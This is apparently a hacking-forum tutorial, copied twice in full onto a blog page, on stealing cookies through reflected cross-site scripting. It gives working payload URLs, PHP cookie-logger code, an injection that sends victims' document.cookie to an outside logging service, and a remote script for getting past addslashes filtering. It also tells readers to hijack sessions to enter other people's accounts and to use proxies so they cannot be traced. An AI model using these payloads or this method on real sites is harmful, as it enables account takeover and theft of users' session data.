In this TuT I will be explaining the procedure of Cookie Stealing via XSS in simple steps. It can be applied on any website but in this TuT I will use this :http://www.TheUnknown.com/
Step one: Finding a XSS vulnerability
Now everyone who wanna learn cookie stealing via XSS all ready know this , so I won't explain it in detail here .
In here I will stick to GET variable XSS to make it easier.
Here's our PoC XSS vulnerability:
Code:
http://www.TheUnknown.com/search.php?query="><scblockedript>alert(123)</scblockedript>
When this page is loaded a message will pop up saying " 123 " this means we got our Vulnerability.
Step two: Setting up a cookie stealer
We will use PHP surely , here's an example of a simple cookie stealer :
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>
( You can find lots of em all over HF all you have to do is to stick to the Search button on the top of the page )
There's lots of ways to log cookie as well , the best one in my opinion can be found here ( It is more Secure ): http://ccl.whiteacid.org/ .If you use yours it will be easy to track you down this is why we will use this one cose it also gives you an anonymous account with a random ID number instead of a username . For this TuT I will be using this ID : 123456
Now lets check the service , and to do that , follow the link :
Code:
http://ccl.whiteacid.org/log.php?123456test_for_XSS.
As you see , THE ID MUST BE INCLUDED IN THE TEST URL .
Now we login to http://ccl.whiteacid.org/ and see the new entry with our IP, referer, user agent and of course the data "test_for_XSS". The cookie logger works fine.
Step three: Logging a cookie
So we have a XSS vulnerability and we have a cookie logger. Now we just have to connect them to each other.
We make a new injection (instead of that alert thing) which sends the cookie data. It could look like this:
Code:
http://www.TheUnknown.com/search.php?query="><scblockedript>location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;</scblockedript>
If the site doesn't use addslashes() or any other filters that mess up our injection, we have successfully captured the cookie and saved it in our account. From here, we can copy the users' cookies (most commonly the sessions) to our own cookies and get into their accounts...
Step four: Filter evasion
Let's say we encountered the following common problem: the target page uses addslashes() on the GET variable before printing it, which kills our injection by destroying our quotes. No problem, we just have to do it another way then.
We register a new account on a free hosting site (I'll use the FreeWebs.com ) and make a new scblockedript file there. I make a file called cookiesteal.js and give it the following content:
Code:
location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;
Now we call the scblockedript through the XSS vulnerable page:
Code:
http://www.TheUnknown.com/search.php?query="><scblockedript src=http://www.freewebs.com/uber0n/cookiesteal.js>
Login to http://ccl.whiteacid.org once again and you'll see the new entry. However, remember NOT to register the account on the hosting site with your normal nickname and make sure you register using a good proxy so that you can't be tracked. You can also ask XSSed.com to host your scblockedript files.
If you encounter other filters than addslashes, try running the scblockedripts through iframes, images etc.
Thanks for reading , Enjoy
Credit's To TheUnkown
Step one: Finding a XSS vulnerability
Now everyone who wanna learn cookie stealing via XSS all ready know this , so I won't explain it in detail here .
In here I will stick to GET variable XSS to make it easier.
Here's our PoC XSS vulnerability:
Code:
http://www.TheUnknown.com/search.php?query="><scblockedript>alert(123)</scblockedript>
When this page is loaded a message will pop up saying " 123 " this means we got our Vulnerability.
Step two: Setting up a cookie stealer
We will use PHP surely , here's an example of a simple cookie stealer :
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>
( You can find lots of em all over HF all you have to do is to stick to the Search button on the top of the page )
There's lots of ways to log cookie as well , the best one in my opinion can be found here ( It is more Secure ): http://ccl.whiteacid.org/ .If you use yours it will be easy to track you down this is why we will use this one cose it also gives you an anonymous account with a random ID number instead of a username . For this TuT I will be using this ID : 123456
Now lets check the service , and to do that , follow the link :
Code:
http://ccl.whiteacid.org/log.php?123456test_for_XSS.
As you see , THE ID MUST BE INCLUDED IN THE TEST URL .
Now we login to http://ccl.whiteacid.org/ and see the new entry with our IP, referer, user agent and of course the data "test_for_XSS". The cookie logger works fine.
Step three: Logging a cookie
So we have a XSS vulnerability and we have a cookie logger. Now we just have to connect them to each other.
We make a new injection (instead of that alert thing) which sends the cookie data. It could look like this:
Code:
http://www.TheUnknown.com/search.php?query="><scblockedript>location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;</scblockedript>
If the site doesn't use addslashes() or any other filters that mess up our injection, we have successfully captured the cookie and saved it in our account. From here, we can copy the users' cookies (most commonly the sessions) to our own cookies and get into their accounts...
Step four: Filter evasion
Let's say we encountered the following common problem: the target page uses addslashes() on the GET variable before printing it, which kills our injection by destroying our quotes. No problem, we just have to do it another way then.
We register a new account on a free hosting site (I'll use the FreeWebs.com ) and make a new scblockedript file there. I make a file called cookiesteal.js and give it the following content:
Code:
location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;
Now we call the scblockedript through the XSS vulnerable page:
Code:
http://www.TheUnknown.com/search.php?query="><scblockedript src=http://www.freewebs.com/uber0n/cookiesteal.js>
Login to http://ccl.whiteacid.org once again and you'll see the new entry. However, remember NOT to register the account on the hosting site with your normal nickname and make sure you register using a good proxy so that you can't be tracked. You can also ask XSSed.com to host your scblockedript files.
If you encounter other filters than addslashes, try running the scblockedripts through iframes, images etc.
Thanks for reading , Enjoy
Credit's To TheUnkown
0 comments:
Post a Comment